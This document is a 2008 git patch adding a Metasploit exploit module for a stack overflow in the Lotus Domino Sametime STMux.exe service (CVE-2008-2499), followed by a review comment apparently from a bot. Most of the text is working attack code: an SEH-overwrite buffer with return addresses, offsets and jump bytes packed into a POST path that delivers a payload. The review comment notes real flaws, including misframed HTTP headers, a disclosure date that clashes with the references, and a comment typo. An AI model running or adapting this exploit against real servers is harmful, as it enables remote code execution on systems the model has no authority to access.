From e14bf65099cdbc75c2fc7777b4703a101958e416 Mon Sep 17 00:00:00 2001
From: Patrick Webster
Date: Fri, 14 Nov 2008 11:04:33 +0000
Subject: [PATCH] Added domino_sametime_stmux module.
git-svn-id: file:///home/svn/framework3/trunk@5919 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/lotus/domino_sametime_stmux.rb | 120 ++++++++++++++++++
 1 file changed, 120 insertions(+)
 create mode 100644 modules/exploits/windows/lotus/domino_sametime_stmux.rb
diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb
new file mode 100644
index 0000000000..1bfb4e398d
--- /dev/null
+++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb
@@ -0,0 +1,120 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Lotus Domino Sametime STMux.exe Stack Overflow',
+ 'Description' => %q{
+ This module exploits a stack overflow in Lotus Domino's Sametime
+ Server. By sending an overly long POST request to the Multiplexer
+ STMux.exe service we are able to overwrite SEH. Based on the exploit
+ by Manuel Santamarina Suarez.
+ },
+ 'Author' => 'patrick',
+ 'Arch' => [ ARCH_X86 ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'BID', '29328' ],
+ [ 'CVE', '2008-2499' ],
+ [ 'OSVDB', '45610' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ],
+ ],
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00\x0a\x0d",
+ 'StackAdjustment' => -3500,
+ },
+ 'Platform' => ['win'],
+ 'Targets' =>
+ [
+ # Patrick - Tested OK against Windows 2003 SP1 20081114
+ [ 'Lotus Sametime 7.5 on Windows Server 2000', { 'Ret' => 0x7c3410c2, 'Offset' => 268 } ], # pop ecx, pop exc, ret msvcr71.dll
+ [ 'Lotus Sametime 7.5 on Windows Server 2003', { 'Ret' => 0x7c3410c2, 'Offset' => 269 } ], # pop ecx, pop exc, ret msvcr71.dll
+ ],
+ 'DisclosureDate' => 'Dec 27 2004', #
+ 'DefaultTarget' => 1))
+
+ register_options(
+ [
+ Opt::RPORT(1533),
+ ], self.class)
+ end
+
+ def check
+ connect
+
+ req = "HEAD / HTTP/1.0\r\n\r\n"
+ req << "User-Agent: Sametime Community Agent\r\n"
+ req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
+ sock.put(req)
+ res = sock.get_once(-1,3)
+
+ disconnect
+
+ if (res =~/Lotus-Domino/)
+ connect
+
+ req = "GET /CommunityCBR HTTP/1.0\r\n\r\n"
+ req << "User-Agent: Sametime Community Agent\r\n"
+ req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
+ sock.put(req)
+ res = sock.get_once(-1,3)
+
+ disconnect
+
+ if (res =~/200 OK/)
+ return Exploit::CheckCode::Detected
+ end
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ connect
+
+ # Patrick - We should use Metasm here.
+ #popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * 3
+ #popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset']
+
+ popad = "\x5b" * 3 + "\x61" * target['Offset'] + "\xff\x24\x24" # pop ebx, popad jmp, dword ptr ss:[esp]
+ jmp = "\x74\x23" + "\x75\x21" # je short, jnz short
+ path = "\x66" * 44 + jmp + [target['Ret']].pack('V') + "\x66" * 29 + popad
+
+ req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
+ req << "User-Agent: Sametime Community Agent\r\n"
+ req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
+ req << "Content-Length: #{payload.encoded.length.to_s}\r\n"
+ req << "Connection: Close\r\n"
+ req << "Cache-Control: no-cache\r\n\r\n"
+ req << payload.encoded
+
+ sock.put(req)
+
+ handler
+ disconnect
+ end
+end
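Review bot: In `check`, the request line `"HEAD / HTTP/1.0\r\n\r\n"` already closes the header block, so the User-Agent and Host lines appended after it are never seen by the server as headers; the `GET /CommunityCBR` request in the same method is framed the same way, and in both the blank line should follow the last header instead: `req = "HEAD / HTTP/1.0\r\n"` … `req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n\r\n"`. The module metadata is also internally inconsistent: `'DisclosureDate' => 'Dec 27 2004', #` carries a dangling `#` while every reference listed (BID 29328, CVE-2008-2499, ZDI-08-028) is from 2008, so the date should be verified against the advisory before this lands. The comment `# Patrick - Tested OK against Windows 2003 SP1 20081114` sits above both targets but only matches the Server 2003 entry (the default), so the Server 2000 target should either be marked untested or the comment moved onto the line it applies to. The trailing comments on both target lines read `# pop ecx, pop exc, ret msvcr71.dll` where `pop ecx, pop ecx, ret` appears to be meant.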